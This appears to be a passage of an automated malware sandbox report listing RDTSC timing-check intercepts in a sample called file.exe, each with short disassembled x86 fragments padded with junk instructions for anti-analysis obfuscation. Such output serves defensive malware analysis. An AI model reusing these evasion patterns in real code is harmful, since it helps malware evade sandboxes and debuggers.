                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C492E6 second address: C492EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C405BD second address: C405CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 jns 00007F99607DC0C6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4893A second address: C4896D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F996107E1C1h 0x00000009 jmp 00007F996107E1C5h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F996107E1B6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4896D second address: C48982 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0CFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48982 second address: C4898C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F996107E1BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48B4A second address: C48B50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48B50 second address: C48B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F996107E1C9h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B3A8 second address: C4B3AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B3AC second address: C4B3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F996107E1C4h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jp 00007F996107E1C2h 0x00000017 jnc 00007F996107E1BCh 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 pushad 0x00000021 push esi 0x00000022 pop esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B46D second address: C4B471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B471 second address: C4B477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B477 second address: C4B4BB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99607DC0C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007F99607DC0D4h 0x00000012 mov dword ptr [ebp+122D1B70h], edx 0x00000018 push 00000000h 0x0000001a mov dword ptr [ebp+122D213Fh], eax 0x00000020 mov dword ptr [ebp+122D1B70h], esi 0x00000026 push 28CE1880h 0x0000002b push eax 0x0000002c push edx 0x0000002d jng 00007F99607DC0C8h 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B657 second address: C4B672 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F996107E1C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B72F second address: C4B733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B733 second address: C4B737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B80E second address: C4B812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B812 second address: C4B862 instructions: 0x00000000 rdtsc 0x00000002 je 00007F996107E1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ebx 0x0000000d jo 00007F996107E1B8h 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jnl 00007F996107E1C0h 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 js 00007F996107E1B6h 0x00000029 popad 0x0000002a pop eax 0x0000002b pushad 0x0000002c sub dword ptr [ebp+122D1B75h], esi 0x00000032 add dword ptr [ebp+122D1B75h], edi 0x00000038 popad 0x00000039 lea ebx, dword ptr [ebp+1244D314h] 0x0000003f mov dword ptr [ebp+122D3702h], edx 0x00000045 mov edx, 469CBA0Bh 0x0000004a xchg eax, ebx 0x0000004b push edi 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B862 second address: C4B866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6BED6 second address: C6BEDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6BEDE second address: C6BEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6BEE3 second address: C6BF0C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F996107E1D1h 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6BF0C second address: C6BF10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C771 second address: C6C790 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1BCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jg 00007F996107E1B6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C790 second address: C6C79A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99607DC0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CAB5 second address: C6CAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F996107E1BCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CE7C second address: C6CE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0D6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D08C second address: C6D09D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D09D second address: C6D0A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D0A2 second address: C6D0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F996107E1C6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D0C1 second address: C6D0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C399D5 second address: C399DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C399DC second address: C399E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C399E1 second address: C39A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F996107E1C2h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C39A02 second address: C39A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C39A08 second address: C39A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C39A0C second address: C39A12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C39A12 second address: C39A19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D228 second address: C6D22E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D22E second address: C6D23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F996107E1B6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D23D second address: C6D241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D241 second address: C6D258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F996107E1BCh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6DAC6 second address: C6DACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6DC5B second address: C6DC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F996107E1B6h 0x0000000a popad 0x0000000b jns 00007F996107E1B8h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 js 00007F996107E1B6h 0x0000001a jnl 00007F996107E1B6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C704DF second address: C704EC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C704EC second address: C704F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6F5E9 second address: C6F5FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jnp 00007F99607DC0C6h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6F5FE second address: C6F603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70796 second address: C7079A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7079A second address: C707A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C707A0 second address: C707AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F99607DC0C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C708F3 second address: C708F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C708F7 second address: C708FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C708FD second address: C7090F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F996107E1B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74D14 second address: C74D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0CEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F99607DC0CCh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74D35 second address: C74D43 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74D43 second address: C74D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74D47 second address: C74D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F996107E1D2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74D55 second address: C74D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C77F8D second address: C77F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C77F93 second address: C77F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C783E1 second address: C783F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jl 00007F996107E1B6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78561 second address: C78580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 pushad 0x0000000a jmp 00007F99607DC0D3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7BB88 second address: C7BB8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7BD08 second address: C7BD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7BD0C second address: C7BD10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C1E3 second address: C7C1E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C305 second address: C7C309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C799 second address: C7C79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C79D second address: C7C7A3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C7A3 second address: C7C7B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99607DC0D1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CAE0 second address: C7CAE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CB7B second address: C7CB7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CB7F second address: C7CB85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CB85 second address: C7CB9C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99607DC0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 jns 00007F99607DC0C6h 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CCDF second address: C7CD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F996107E1BCh 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F996107E1B8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov si, 9544h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push esi 0x0000002f pushad 0x00000030 popad 0x00000031 pop esi 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DC23 second address: C7DC29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DC29 second address: C7DC3C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F996107E1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DC3C second address: C7DC40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DC40 second address: C7DC46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DC46 second address: C7DC56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99607DC0CCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7ECFF second address: C7ED25 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F996107E1BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F996107E1BCh 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F996107E1B6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7ED25 second address: C7ED29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82403 second address: C82407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82407 second address: C82486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F99607DC0C8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 mov dword ptr [ebp+122D39DBh], ebx 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007F99607DC0C8h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 mov edi, dword ptr [ebp+122D30F9h] 0x0000004d jmp 00007F99607DC0CDh 0x00000052 xchg eax, ebx 0x00000053 jmp 00007F99607DC0D7h 0x00000058 push eax 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d pop eax 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8428C second address: C84291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C84291 second address: C842B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F99607DC0C6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F99607DC0D7h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C84865 second address: C848CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F996107E1B8h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 mov bx, cx 0x00000024 push 00000000h 0x00000026 sub dword ptr [ebp+1244DD7Bh], ebx 0x0000002c mov edi, 1ABCB362h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F996107E1B8h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d mov dword ptr [ebp+122D17F6h], esi 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C848CB second address: C848D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C857FA second address: C857FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85958 second address: C85973 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99607DC0C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F99607DC0CCh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85973 second address: C8597D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F996107E1BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
